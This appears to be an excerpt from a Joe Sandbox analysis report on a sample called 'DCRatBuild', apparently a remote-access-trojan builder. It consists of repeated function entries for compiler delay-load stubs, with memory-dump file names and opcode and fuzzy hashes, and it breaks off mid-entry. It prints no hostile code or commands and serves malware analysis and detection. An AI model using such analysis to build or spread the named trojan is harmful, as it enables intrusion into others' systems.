Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb1f657ea8e8f9e1291c76f4a42fd7b0cb9a2b451bb6917444f36072150a3c1b
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: fb1f657ea8e8f9e1291c76f4a42fd7b0cb9a2b451bb6917444f36072150a3c1b
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 11c020d73bb919057fd64763419bdc8e71fc18b80e637b5b0ee2e67d900ee8c6
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: 11c020d73bb919057fd64763419bdc8e71fc18b80e637b5b0ee2e67d900ee8c6
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dec8bab9e726cbbf03642057f4d46dd52ba6a4e1f7566028e11b25678b24e2f5
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: dec8bab9e726cbbf03642057f4d46dd52ba6a4e1f7566028e11b25678b24e2f5
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ed0061538b3a360957d8e2467ff4e29dfa3380dd0d9191f35a8669d07d86ca93
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: ed0061538b3a360957d8e2467ff4e29dfa3380dd0d9191f35a8669d07d86ca93
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9ada44d9c2bdedf37835eb0042f2bcfbe634e2763ff91cfdbfc0e4d2f7a4bdd3
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: 9ada44d9c2bdedf37835eb0042f2bcfbe634e2763ff91cfdbfc0e4d2f7a4bdd3
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 785004a624a2046da6d64d179286cc76a22853b9a76fe454fe32a084ba9d91a7
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: 785004a624a2046da6d64d179286cc76a22853b9a76fe454fe32a084ba9d91a7
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a73191e477dc872bf6ca940dec39c01710ed370fd4b7cd5d479376213e0790f
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: 9a73191e477dc872bf6ca940dec39c01710ed370fd4b7cd5d479376213e0790f
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16e2d294c5a305f173fccb99ff59ea9ea499fe60354d2e84b894ddf05aec1ab4
Instruction ID: 19e7188466532f118ab4a777def0d83cf623c6d69a260aa0c0324e9c3858058b
Opcode Fuzzy Hash: 16e2d294c5a305f173fccb99ff59ea9ea499fe60354d2e84b894ddf05aec1ab4
Instruction Fuzzy Hash: 38A011E22A8082BC3008B280AC0AC3F020CE2C2B20330802EF8A8A8082AC800C000A32

Function 0008E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 95002ce4a4683da116d39d03920e499a75f19cc3d3d8bae1921f08ef645ff46a
Instruction ID: e0358dcee5e76fb90c18fd7a82a94540341b124f8a4317758887bbe119ed8a36
Opcode Fuzzy Hash: 95002ce4a4683da116d39d03920e499a75f19cc3d3d8bae1921f08ef645ff46a
Instruction Fuzzy Hash: A1A011E22A8082BC3008B280AC0AC3F020CE2C2B20330882EF88AA8082AC800C000A32

Function 0008E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a3411fd98cba1df362c873e2259902be7f5f805b50a9b60d875ed18af4adec9
Instruction ID: e0358dcee5e76fb90c18fd7a82a94540341b124f8a4317758887bbe119ed8a36
Opcode Fuzzy Hash: 8a3411fd98cba1df362c873e2259902be7f5f805b50a9b60d875ed18af4adec9
Instruction Fuzzy Hash: A1A011E22A8082BC3008B280AC0AC3F020CE2C2B20330882EF88AA8082AC800C000A32

Function 0008E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d00d753029e166f8d85a3d3eafe6e1d3a13c86b01a46bb449aa3843f4aca0ae
Instruction ID: e0358dcee5e76fb90c18fd7a82a94540341b124f8a4317758887bbe119ed8a36
Opcode Fuzzy Hash: 6d00d753029e166f8d85a3d3eafe6e1d3a13c86b01a46bb449aa3843f4aca0ae
Instruction Fuzzy Hash: A1A011E22A8082BC3008B280AC0AC3F020CE2C2B20330882EF88AA8082AC800C000A32

Function 0008E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf251cfd9dd293904222bef7a5b55b5871a54d20b257d04ecb55e707f7d025ac
Instruction ID: e0358dcee5e76fb90c18fd7a82a94540341b124f8a4317758887bbe119ed8a36
Opcode Fuzzy Hash: bf251cfd9dd293904222bef7a5b55b5871a54d20b257d04ecb55e707f7d025ac
Instruction Fuzzy Hash: A1A011E22A8082BC3008B280AC0AC3F020CE2C2B20330882EF88AA8082AC800C000A32

Function 0008E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9b7fc3769a988ae7a5bec141144c7ed51fd014f900b1360a22a1a1980efad1c
Instruction ID: e0358dcee5e76fb90c18fd7a82a94540341b124f8a4317758887bbe119ed8a36
Opcode Fuzzy Hash: b9b7fc3769a988ae7a5bec141144c7ed51fd014f900b1360a22a1a1980efad1c
Instruction Fuzzy Hash: A1A011E22A8082BC3008B280AC0AC3F020CE2C2B20330882EF88AA8082AC800C000A32

Function 0008E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 051f9241a7cf0396c4fb53d4e28039ddd5b08a660c13a46f53e76752a16000e6
Instruction ID: 0b7437a9050592dc5cc43e7ab1eeecff60edffabe141e99aa8c2c2046e039c52
Opcode Fuzzy Hash: 051f9241a7cf0396c4fb53d4e28039ddd5b08a660c13a46f53e76752a16000e6
Instruction Fuzzy Hash: 2AA011C22A8882BC3008B280AC02C3F220CE2C2F20330882EF88A88082AC800C000A30

Function 0008E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3e7599a18e287e216f1502a74a802cd628e853ac3f0fbfb7ecf999e189cee60d
Instruction ID: 0b7437a9050592dc5cc43e7ab1eeecff60edffabe141e99aa8c2c2046e039c52
Opcode Fuzzy Hash: 3e7599a18e287e216f1502a74a802cd628e853ac3f0fbfb7ecf999e189cee60d
Instruction Fuzzy Hash: 2AA011C22A8882BC3008B280AC02C3F220CE2C2F20330882EF88A88082AC800C000A30

Function 0008E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e7ef2c8cd50a23a9608fe067878c7d67ff44fa18e8b5d59e9a14fd0493e5e334
Instruction ID: 0b7437a9050592dc5cc43e7ab1eeecff60edffabe141e99aa8c2c2046e039c52
Opcode Fuzzy Hash: e7ef2c8cd50a23a9608fe067878c7d67ff44fa18e8b5d59e9a14fd0493e5e334
Instruction Fuzzy Hash: 2AA011C22A8882BC3008B280AC02C3F220CE2C2F20330882EF88A88082AC800C000A30

Function 0008E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 77da4db5fb57ad1d8bac9b5b39740779f8fc98a229b06fa0df4f19dbb25731ae
Instruction ID: 0b7437a9050592dc5cc43e7ab1eeecff60edffabe141e99aa8c2c2046e039c52
Opcode Fuzzy Hash: 77da4db5fb57ad1d8bac9b5b39740779f8fc98a229b06fa0df4f19dbb25731ae
